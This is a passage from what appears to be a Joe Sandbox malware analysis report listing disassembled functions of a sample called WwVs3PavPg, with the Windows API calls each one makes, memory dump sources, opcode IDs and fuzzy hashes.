Instruction Fuzzy Hash: D13118B141425E9FEF12DF50C848ADE3BE8EF06304F541526E98186941E7B69CA4CF99

Function 009A6498 Relevance: 4.6, APIs: 3, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009A6517
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009A653E
GetNativeSystemInfo.KERNEL32(?), ref: 009A6595

Memory Dump Source

Source File: 00000000.00000002.3069516453.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a2000_WwVs3PavPg.jbxd

Similarity

API ID: Open$InfoNativeSystem
String ID:
API String ID: 1247124224-0
Opcode ID: d52bf3103e115d2343c17db7d821f5ca15ecce39868d903a9dc2f8101d3b0584
Instruction ID: c64d6e0c6df843e9b66064e393cdf1897c77e3d3c69064f89f72753c03b9bdf4
Opcode Fuzzy Hash: d52bf3103e115d2343c17db7d821f5ca15ecce39868d903a9dc2f8101d3b0584
Instruction Fuzzy Hash: 0C218E7281425EDEEF22CF60C848ADF3BA8EB06304F550526ED81C6D41D77A9DA4CF89

Function 004020C0 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020F6
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402117
CloseHandle.KERNEL32(00000000), ref: 0040211E

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
Instruction ID: 54406537bc71ee86772d4e0f102f4040d02d69394e2def86726d8d124470bd26
Opcode Fuzzy Hash: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
Instruction Fuzzy Hash: 4401D671610204ABD720DF68DD49FEEB7A8EB48725F00053EFA45AA2D0DAB46945C758

Function 04D50931 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 748COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=
API String ID: 0-322501076
Opcode ID: 7dae2c11b75f7d6a3901484f6ecb684415846db56126e2f5dc85f38f1b06c153
Instruction ID: 2e3f576e73bc862fae619213035fe928e98c57cb2d43e6bd76a0d8803886443a
Opcode Fuzzy Hash: 7dae2c11b75f7d6a3901484f6ecb684415846db56126e2f5dc85f38f1b06c153
Instruction Fuzzy Hash: 8BE1F3EB74C211BD7A03C5456B54AFB6BAEE6C67303308427FC87C6612FA94EE496131

Function 04D508E0 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 739COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=
API String ID: 0-322501076
Opcode ID: 50f870a7ac2a97ef4f34d52f86ff0e084716c6a411d2bd30215488cd587b1d5f
Instruction ID: aa6c414927ca1e81c064a13c9598e7fd765a3160e636c04380444cf4c7a479cc
Opcode Fuzzy Hash: 50f870a7ac2a97ef4f34d52f86ff0e084716c6a411d2bd30215488cd587b1d5f
Instruction Fuzzy Hash: 35E1E4EB74C211BD7A4385456B54AFB67AEE6C77303308427FC87C5622FA94EE492131

Function 04D5090F Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 726COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=
API String ID: 0-322501076
Opcode ID: f80e9a0eb098b19e8f728db9aa1bcc215eb7ce6e772d7db031ab2c9c8d2df169
Instruction ID: b7a04b051bf7e9c1b515e0e2baf21000d3269c069edb9c934da412e041e69250
Opcode Fuzzy Hash: f80e9a0eb098b19e8f728db9aa1bcc215eb7ce6e772d7db031ab2c9c8d2df169
Instruction Fuzzy Hash: 49E1D3EB74C211BD7A43C5456B54AFB6BAEE6C67303308427FC87C6612FA94EE492131

Function 04D508FD Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 725COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=
API String ID: 0-322501076
Opcode ID: 8dcaeaddec413b844405af83d53a4277c90158986d97e86bc848210b77085802
Instruction ID: e01a733116a20d9f9014c07011d82c45807c4f9b0a70919d7917e077f562dd7a
Opcode Fuzzy Hash: 8dcaeaddec413b844405af83d53a4277c90158986d97e86bc848210b77085802
Instruction Fuzzy Hash: A0E1D2EB74C211BD7A43C5456B54AFB67AEE6C67303308427FC87C6622FA94EE492131

Function 04D5097C Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 704COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=
API String ID: 0-322501076
Opcode ID: 854f52bd8044c640d6d649ddc1a0ce6a321691753a2d0bb1cba31a0ca1022afe
Instruction ID: f2f13f06e873a9d516b6e7431b3f7e82ea7ae1e971c6f6d5bf3178bfdcdbe88f
Opcode Fuzzy Hash: 854f52bd8044c640d6d649ddc1a0ce6a321691753a2d0bb1cba31a0ca1022afe
Instruction Fuzzy Hash: C0E1E4EB74C111BD7A0385456B54AFB6BAEE5C7730330842BFC87C6612FA94EE496131

Function 04D509E8 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 685COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=
API String ID: 0-322501076
Opcode ID: 007b1ae10eef32f884466627f9f29070be1a782d0418e9dc4a055868e95279db
Instruction ID: 908d834bfe50989dcc4b7143fe92ca3eed6439307e899e112c774267106224ed
Opcode Fuzzy Hash: 007b1ae10eef32f884466627f9f29070be1a782d0418e9dc4a055868e95279db
Instruction Fuzzy Hash: 66D1F4EB70C211BD7A1385456B54AFB6BBDE6C6730330842BFC87C6612FA94AE496131

Function 04D509B3 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 683COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=
API String ID: 0-322501076
Opcode ID: 6dc9a5ba643f79a035015f2da7791cfee1e33b9ce054a7903290c2e68da4ffed
Instruction ID: b56fb296a722ba48a2e8aa54e6a06dbe2a4acbed24aa10c746609cc953301354
Opcode Fuzzy Hash: 6dc9a5ba643f79a035015f2da7791cfee1e33b9ce054a7903290c2e68da4ffed
Instruction Fuzzy Hash: 67D1E3EB74C111BD7A03C5456B54AFB6BAEE5C67303308427FC87C6622FA94EE4A6131

Function 04D509C2 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 681COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=
API String ID: 0-322501076
Opcode ID: aaf0b646d0d57791fc1b01126181fc92c9452eab342dd30d4d0a9cf1d612b3ba
Instruction ID: 87d14fad8eb21465cb2e0ee4f21b0c055d68983816de780e36ae19ac3007cc21
Opcode Fuzzy Hash: aaf0b646d0d57791fc1b01126181fc92c9452eab342dd30d4d0a9cf1d612b3ba
Instruction Fuzzy Hash: 91D1E3EB74C111BD7A03C5456B54AFB67AEE6C67303308427FC87C6612FA94EE4A2131

Function 04D509DA Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 672COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=
API String ID: 0-322501076
Opcode ID: 9bb96afff86ea269c59c33151368fd0fda30b4dd74b737f6339b1613a5783a39
Instruction ID: a0e586fd8941023a6c0a51c7db8324b1faaf403c2a9ea4b8e418ca0302149436
Opcode Fuzzy Hash: 9bb96afff86ea269c59c33151368fd0fda30b4dd74b737f6339b1613a5783a39
Instruction Fuzzy Hash: 4BD1F4EB74C211BD7A0385456B54EFB6BAEE6C67303308427FC87C6612FA94EE496131

Function 04D50C49 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 494COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Strings

ZXP, xrefs: 04D50C5C

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID: ZXP
API String ID: 309727707-2878008129
Opcode ID: 07df4151c6db3af4610e3fe293c8274aec581f3ae439a1f0a435f22795d26731
Instruction ID: ef1a125b2253fe597984a15cfa39cecad4214f27f4b1a6d2bbfc04083938cae2
Opcode Fuzzy Hash: 07df4151c6db3af4610e3fe293c8274aec581f3ae439a1f0a435f22795d26731
Instruction Fuzzy Hash: 73A106EB70C211BD764385456B54AFBABADE6C67303308427FC87C6612FA94EE896131

Function 04B40E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,04B40223,?,?), ref: 04B40E19
SetErrorMode.KERNEL32(00000000,?,?,04B40223,?,?), ref: 04B40E1E

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f91484002589e88e4a4d3f6ea8ab43fed4857b487d85ba7f5556b63228273427
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 0BD0123154512877D7003A94DC09BCD7B1CDF09B62F008451FB0DD9080C770964046E6

Function 04D50A45 Relevance: 2.1, APIs: 1, Instructions: 641COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 43a9d3112be0a84bec31d929c7656981618fb3d61329b68f2f108d3bd93af4e8
Instruction ID: 5454e2b14cb5884c69962d1e56bbb520cea0f49400d845545581251faf0b249d
Opcode Fuzzy Hash: 43a9d3112be0a84bec31d929c7656981618fb3d61329b68f2f108d3bd93af4e8
Instruction Fuzzy Hash: C8C1D3EB70C211BD7A4385456B54AFB67ADE6C67303308427FC87C6A12FA94EE496131

Function 04D50AAB Relevance: 2.1, APIs: 1, Instructions: 597COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 6afb4a86aa1a65bcda575932e138f372aca68a289f280618d0abe63bc8036a1f
Instruction ID: 14540a36d85bbe17a736706c32611ebd6dc5724b49f9d88706d64c0b3c6ab0a8
Opcode Fuzzy Hash: 6afb4a86aa1a65bcda575932e138f372aca68a289f280618d0abe63bc8036a1f
Instruction Fuzzy Hash: 79C1F4EB70C211BD7A1385456B54AFB6BADE6C77303308427FC87C6622FA94EE496131

Function 04D50A90 Relevance: 2.1, APIs: 1, Instructions: 595COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 2de9efbb522bd9202c8b87528dbb6dc38e43924aa4c10791a55e8befb228d9c9
Instruction ID: fc9d85069f19c8fe5cae221e008efbe78fb35936eb177b490112f11f2cd4b924
Opcode Fuzzy Hash: 2de9efbb522bd9202c8b87528dbb6dc38e43924aa4c10791a55e8befb228d9c9
Instruction Fuzzy Hash: 11C105EB70C211BD7A4385456B54AFB6BBDE6C67303308427FC87C6622FA94EE496131

Function 04D50AD7 Relevance: 2.1, APIs: 1, Instructions: 579COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 5bc2b9a902ad42b3e38c921db2d433e09b81d3e29511b0fc492068fc8094d9e0
Instruction ID: 5cb2be51015ba272b92d1e4fe3831bc307a001e1b076f1137cd74a2c76a15c02
Opcode Fuzzy Hash: 5bc2b9a902ad42b3e38c921db2d433e09b81d3e29511b0fc492068fc8094d9e0
Instruction Fuzzy Hash: 72C1F4EB70C211BD7A4385456B54AFB6BBDE6C67303308427FC87C6612FA94EE496131

Function 04D50AFD Relevance: 2.1, APIs: 1, Instructions: 561COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c430f0a02470b634b1596c61a9e8d8c73f0a1f3103dcbb764b0b8f2fdb3517f6
Instruction ID: 01e9fb14557b290c00284cde30a040146da5481b09797f94b25afb84c3066b69
Opcode Fuzzy Hash: c430f0a02470b634b1596c61a9e8d8c73f0a1f3103dcbb764b0b8f2fdb3517f6
Instruction Fuzzy Hash: 40B116EB70C111BD7A1385456B54AFB6BBDE6C67303308427FC87C6A22FA94EE496131

Function 04D50B06 Relevance: 2.1, APIs: 1, Instructions: 557COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: e2acbe0ad0f8082f9ab0923d12186cb1121f634077acb696a4a39996851f85b1
Instruction ID: e28038949a22e0c217c9bcf6cad475c1b160d5228496eeca4352700c076fbbf3
Opcode Fuzzy Hash: e2acbe0ad0f8082f9ab0923d12186cb1121f634077acb696a4a39996851f85b1
Instruction Fuzzy Hash: E6B104EB70C211BD7A5385456B54AFB6BBDE6C67303308427FC87C6A12FA94EE496130

Function 04D50B9C Relevance: 2.1, APIs: 1, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee507dfa836d62b60287ab52781f4077475913077ea8049483158b338cca1b3
Instruction ID: 307126611be146e8cd5ee8c3e6d29f921bb61ee71ada13c6eca8d9cfaef4f257
Opcode Fuzzy Hash: 5ee507dfa836d62b60287ab52781f4077475913077ea8049483158b338cca1b3
Instruction Fuzzy Hash: 51B105EB74C211BD7A1385456B54AFA6BBDE6C77303308427FC87C6622FA90EE496130

Function 04D50B56 Relevance: 2.0, APIs: 1, Instructions: 550COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a5a0b947736d679d4320a69976eaeff9e9cb934f14726b1f5b3d07b406cad78
Instruction ID: 0ea444b9bf395ace8160906157c855e38a9f9f6873de6a9dcde9ddc4a8fa8c92
Opcode Fuzzy Hash: 4a5a0b947736d679d4320a69976eaeff9e9cb934f14726b1f5b3d07b406cad78
Instruction Fuzzy Hash: 56B1E3EB70C211BD7A5385456B54AFA6BBDE6C67303308427FC87C6622FA90EE496130

Function 04D50B26 Relevance: 2.0, APIs: 1, Instructions: 547COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: bb173427dc12ffdbcd0cedaaddfed242ba0a38dfc6ba6ed236b038d68c3e26d0
Instruction ID: bd163c2c7c3019ed32f44c4fd5d4181f5b661acf5711dbc506a7da8b980a86d3
Opcode Fuzzy Hash: bb173427dc12ffdbcd0cedaaddfed242ba0a38dfc6ba6ed236b038d68c3e26d0
Instruction Fuzzy Hash: F0B105EB70C211BD7A1385456B54AFA6BBDE6C67303308427FC87C6612FA94EE896131

Function 04D50B3C Relevance: 2.0, APIs: 1, Instructions: 546COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 8fe346525f60c0fe00b413ddd7b9edef7f1e8b7122fae1a4e1f7e08633d2343f
Instruction ID: c10572150add93875826c1a7fedb981ff014d48fdba092369ea9c6aae0beb9be
Opcode Fuzzy Hash: 8fe346525f60c0fe00b413ddd7b9edef7f1e8b7122fae1a4e1f7e08633d2343f
Instruction Fuzzy Hash: 5FB1F3EB70C211BD7A5385456B54AFA6BADE6C77303308427FC87C6622FA94EE496130

Function 04D50B77 Relevance: 2.0, APIs: 1, Instructions: 538COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 4cc5e66e874bce52b779784f1fab93c0ca35c4af8564d620e746ef77fe8aacad
Instruction ID: 7af77571de5a19071c488ea5da7595c543c6ad50cac213951ec14c582c18860e
Opcode Fuzzy Hash: 4cc5e66e874bce52b779784f1fab93c0ca35c4af8564d620e746ef77fe8aacad
Instruction Fuzzy Hash: 68B1F3EB70C211BD7A1385456B54AFA6BBDE6C77303308427FC87C6612FA94EE896131

Function 04D50BCC Relevance: 2.0, APIs: 1, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3039a21ef3d40a498a075fe11a732c80192b2475d9601e87cdc46597371d2b7
Instruction ID: 24d088249a2c3ae6471165a29ea4cfe97b8a92c0b717f234d5e484a99a5aa5e6
Opcode Fuzzy Hash: d3039a21ef3d40a498a075fe11a732c80192b2475d9601e87cdc46597371d2b7
Instruction Fuzzy Hash: D9B103EB70C211BD795385456B54AFA6BBDE5C73303308427FC87C6A12FA94EE896131

Function 04D50BE8 Relevance: 2.0, APIs: 1, Instructions: 512COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 3c8ce8bd9bcf838aa74843d9cf49adb41aab6891463f0ac56dcba1e7734b0060
Instruction ID: 6fff297ec39757a5b3124409a3f6d8c35231077dc529329261c27ebb6e40f19d
Opcode Fuzzy Hash: 3c8ce8bd9bcf838aa74843d9cf49adb41aab6891463f0ac56dcba1e7734b0060
Instruction Fuzzy Hash: 2EA102EB70C211BD791385456B54AFA6BADE5C77303308427FC87C6A12FA84EE896130

Function 04D50BFE Relevance: 2.0, APIs: 1, Instructions: 508COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 5a4996fbf5d885b7ad1feb3b5ab5613b70533314c382f4e0cda2e226faedc4ad
Instruction ID: 3f544a8ef51538c1dadcbf143d05e5f05815dd3e3bcb53c4071c34f27bbf0a57
Opcode Fuzzy Hash: 5a4996fbf5d885b7ad1feb3b5ab5613b70533314c382f4e0cda2e226faedc4ad
Instruction Fuzzy Hash: DAA1F4FB70C211BD795285456B54AFB6BADE5C73303308427FC87C6612FA94EE896131

Function 04D50C30 Relevance: 2.0, APIs: 1, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cef1eec5b752096cdd4ef62b221e60ec4c414b5701935c848ff704603358b92c
Instruction ID: 3518b40d21a764b5942eca7a593bc0f14adf916a1ab61ce238c27a4b752c32aa
Opcode Fuzzy Hash: cef1eec5b752096cdd4ef62b221e60ec4c414b5701935c848ff704603358b92c
Instruction Fuzzy Hash: CBA105EB70C211BD794385456B54AFB6BBDE6C67303308427FC87C6612FA94EE896231

Function 04D50C23 Relevance: 2.0, APIs: 1, Instructions: 490COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 87399bb898f0aee65f01411ef025610505624ca552323410d0567d9f06d6872a
Instruction ID: 3e525ba06f638f99c760e4270454be80774fd4f8b376534009a8e2ae37b6ff0a
Opcode Fuzzy Hash: 87399bb898f0aee65f01411ef025610505624ca552323410d0567d9f06d6872a
Instruction Fuzzy Hash: D1A113EB70C211BD794385456B54AFB6BBDE6C6330330842BFC87C6612FA94EE896131

Function 04D50CDE Relevance: 2.0, APIs: 1, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b99233152a0b7e822a7188a536d6a6082e9ebb2b0cf0d03d3cc538fd05f65de5
Instruction ID: 2191aa2be1d025f67f132857f41e7142059dc144bf0bf469ec231f4803c028a5
Opcode Fuzzy Hash: b99233152a0b7e822a7188a536d6a6082e9ebb2b0cf0d03d3cc538fd05f65de5
Instruction Fuzzy Hash: 17A1F5EB70C211BD7A4385456B54AFB6BADE6C73303308427FC87C6612FA94EE896131

Function 04D50D41 Relevance: 2.0, APIs: 1, Instructions: 450COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 87d324542e2c7770df9821419a6fa09937f9a6815513bc86d71b89a346e07873
Instruction ID: 7340625a1fcdb2185b459fe735e776d0f9847efe61ff310df4be37c338e39454
Opcode Fuzzy Hash: 87d324542e2c7770df9821419a6fa09937f9a6815513bc86d71b89a346e07873
Instruction Fuzzy Hash: E19129EB74C111BD7A0385456B54AFB6BADE5C73303308427FC87C6A12FA94EE896131

Function 04D50CC2 Relevance: 1.9, APIs: 1, Instructions: 442COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 1f1f592ff29e535a86084fa51d0a75fa860da825fbcd0e2e799844c7b8c29d27
Instruction ID: 513f422774e275649a35823a92a0d42788929f231e897263a72c2236e4ebd634
Opcode Fuzzy Hash: 1f1f592ff29e535a86084fa51d0a75fa860da825fbcd0e2e799844c7b8c29d27
Instruction Fuzzy Hash: DC9117FB70C211BD794285456B54AFB6BADE6C67303308427FC87C6A12FA90EE896131

Function 04D50D2A Relevance: 1.9, APIs: 1, Instructions: 442COMMON

Download Yara Rule

